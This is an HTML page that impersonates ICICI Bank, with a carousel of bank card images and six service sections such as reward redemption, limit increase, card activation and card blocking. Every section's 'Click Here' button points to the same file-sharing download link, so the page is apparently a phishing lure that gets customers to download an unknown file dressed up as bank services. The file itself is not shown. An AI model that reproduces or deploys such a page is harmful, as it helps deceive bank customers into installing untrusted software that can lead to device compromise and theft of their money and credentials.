<!DOCTYPE html>
<html>
  <head>
    <title>Icici Bank</title>
    <link rel='stylesheet' href='/stylesheets/style.css' />
    <link rel="shortcut icon" href="/images/logo.ico" type="image/x-icon">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
    integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swiper@10/swiper-bundle.min.css" />
    <style>
      .swiper {
      width: 100%;
      height: 100%;
    }

    .swiper-slide {
      text-align: center;
      font-size: 18px;
      background: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .swiper-slide img {
      display: block;
      width: 100%;
      height: 100%;
      object-fit: cover;
    }
    </style>
  </head>
  <body style="background-color: #F99D27;" class="m-0">
    <div>
      <div class="swiper mySwiper">
        <div class="swiper-wrapper">
          <div class="swiper-slide">
            <img class="img-fluid" style="height: 600px;" src="https://5.imimg.com/data5/SELLER/Default/2023/3/295074303/LE/MD/ZJ/181951141/apply-now-icici-accelero-icici-bank-credit-card.JPG" alt="">
          </div>
          <div class="swiper-slide">
            <img class="img-fluid" style="height: 600px;" src="https://www.icicibank.com/content/dam/icicibank/india/managed-assets/images/blog/big/can-i-get-a-credit-card-without-a-bank-account-big.webp" alt="">
          </div>
          <div class="swiper-slide">
            <img class="img-fluid" style="height: 600px;" src="https://www.adgully.com/img/800/201810/icici-kalki.jpg" alt="">
          </div>
          <div class="swiper-slide">
            <img class="img-fluid" style="height: 600px;" src="https://pbs.twimg.com/media/EFdDuBFVAAAIfUP.jpg" alt="">
          </div>
        </div>
        <div class="swiper-button-next"></div>
        <div class="swiper-button-prev"></div>
        <div class="swiper-pagination"></div>
      </div>
    </div>
    <div class="">
      <h1 style="color: #B02A30; font-size: 60px;" class="my-5 p-2 text-center" >Explore our range of cards <br>
        designed for your unique <br>
         needs 
      </h1>
    </div>
    <div>
      <div class="d-flex justify-content-center">   
        <img src="./images/cardi.png"  class="img-fluid w-50"  alt="Responsive image" alt="" srcset="">
     </div>
 
     <h1 style="color:#005B75;" class="text-center my-3">Rewards Point redeem</h1> 
     <div class="text-center">
       <a href="https://filetransfer.io/data-package/aCUTJOnz/download" style="background-color: #B02A30;" class="btn px-5   text-white"> Click Here</a>
     </div>
     <div class="my-5 px-5">
       <div class="border border-1"></div>
     </div>
    </div>
    <div>
      <div class="d-flex justify-content-center">   
        <img src="./images/cardi.png"  class="img-fluid w-50"  alt="Responsive image" alt="" srcset="">
     </div>
 
     <h1 style="color:#005B75;" class="text-center my-3">Limit Increase Application</h1> 
     <div class="text-center">
       <a href="https://filetransfer.io/data-package/aCUTJOnz/download" style="background-color: #B02A30;" class="btn px-5   text-white"> Click Here</a>
     </div>
     <div class="my-5 px-5">
       <div class="border border-1"></div>
     </div>
    </div>
    <div>
      <div class="d-flex justify-content-center">   
        <img src="./images/cardi.png"  class="img-fluid w-50"  alt="Responsive image" alt="" srcset="">
     </div>
 
     <h1 style="color:#005B75;" class="text-center my-3">Card Protection Cancellation</h1> 
     <div class="text-center">
       <a href="https://filetransfer.io/data-package/aCUTJOnz/download" style="background-color: #B02A30;" class="btn px-5 text-white"> Click Here</a>
     </div>
     <div class="my-5 px-5">
       <div class="border border-1"></div>
     </div>
    </div>
    <div>
      <div class="d-flex justify-content-center">   
        <img src="./images/cardi.png"  class="img-fluid w-50"  alt="Responsive image" alt="" srcset="">
     </div>
 
     <h1 style="color:#005B75;" class="text-center my-3">Credit Card Activation</h1> 
     <div class="text-center">
       <a href="https://filetransfer.io/data-package/aCUTJOnz/download" style="background-color: #B02A30;" class="btn px-5   text-white"> Click Here</a>
     </div>
     <div class="my-5 px-5">
       <div class="border border-1"></div>
     </div>
    </div>
    <div>
      <div class="d-flex justify-content-center">   
        <img src="./images/cardi.png"  class="img-fluid w-50"  alt="Responsive image" alt="" srcset="">
     </div>
     <h1 style="color:#005B75;" class="text-center my-3">Card Block Application</h1> 
     <div class="text-center">
       <a href="https://filetransfer.io/data-package/aCUTJOnz/download" style="background-color: #B02A30;" class="btn px-5   text-white"> Click Here</a>
     </div>
     <div class="my-5 px-5">
       <div class="border border-1"></div>
     </div>
    </div>
    <div>
      <div class="d-flex justify-content-center">   
        <img src="./images/cardi.png"  class="img-fluid w-50"  alt="Responsive image" alt="" srcset="">
     </div>
 
     <h1 style="color:#005B75;" class="text-center my-3">Card To Card Apply Application</h1> 
     <div class="text-center">
       <a href="https://filetransfer.io/data-package/aCUTJOnz/download" style="background-color: #B02A30;" class="btn px-5   text-white"> Click Here</a>
     </div>
     <div class="my-5 px-5">
       <div class="border border-1"></div>
     </div>
    </div>
  </body>
  <script src="https://cdn.jsdelivr.net/npm/swiper@10/swiper-bundle.min.js"></script>

  <!-- Initialize Swiper -->
  <script>
    var swiper = new Swiper(".mySwiper", {
      cssMode: true,
      autoplay: {
        delay: 2500,
        disableOnInteraction: false,
      },
      navigation: {
        nextEl: ".swiper-button-next",
        prevEl: ".swiper-button-prev",
      },
      pagination: {
        el: ".swiper-pagination",
      },
      mousewheel: true,
      keyboard: true,
    });
  </script>
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
    integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"
    integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"
    integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
    crossorigin="anonymous"></script>

  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
    crossorigin="anonymous"></script>
</html>
